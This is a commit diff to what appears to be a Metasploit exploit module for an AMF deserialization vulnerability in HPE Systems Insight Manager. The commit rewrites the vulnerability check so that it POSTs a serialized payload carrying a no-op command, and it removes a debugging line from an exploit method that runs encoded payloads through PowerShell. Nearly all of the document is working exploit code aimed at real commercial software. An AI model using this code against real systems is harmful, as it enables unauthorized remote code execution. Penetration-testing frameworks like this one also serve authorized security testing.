Improve the check logic to more accurately detect if a target is vulnerable or not

Author: gwillcox-r7

modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb

@@ -63,7 +63,7 @@ def initialize(info = {})
         'Notes' =>
         {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'SideEffects' => [IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
         },
         'Privileged' => true
@@ -87,19 +87,30 @@ def check
       return CheckCode::Safe("Target doesn't appear to be a HPE System Insight Manager server!")
     end
 
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
+    f_handle = File.open(File.join(data_dir, 'emp.ser'), 'rb')
+    serialized_payload_content = f_handle.read
+    f_handle.close
+    serialized_payload_content_final = payload_template_adjustments(serialized_payload_content, "a") # NOP command of a which will allow for checking if the target is vulnerable.
+
     res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'simsearch', 'messagebroker', 'amfsecure')
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'simsearch', 'messagebroker', 'amfsecure'),
+      'data' => serialized_payload_content_final
     })
-    return CheckCode::Safe('Failed to identify an active amfsecure endpoint on the target.') unless res&.code == 200
 
-    CheckCode::Detected('Found an active amfsecure endpoint on the target!')
+    unless res&.code == 200
+     return CheckCode::Safe("Non-200 HTTP response received during deserialization. Target doesn't seem to be vulnerable!")
+    end
+    unless res.to_s.include?('java.lang.NullPointerException')
+      return CheckCode::Safe("200 OK response didn't contain expected java.lang.NullPointerException. Target is not vulnerable!")
+    end
+    CheckCode::Vulnerable("Target returned java.lang.NullPointerException in its 200 OK response!")
   end
 
   def exploit
     case target['Type']
     when :windows_command
-      require 'pry'; binding.pry
       execute_command(payload.encoded.gsub(/^powershell(?:\.exe)* /, 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ')) # If PowerShell is being used to run the command, specify the full path so that it will run correctly.
     when :windows_powershell
       execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true).prepend('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\')) # Need full path to PowerShell binary for it to run for some reason.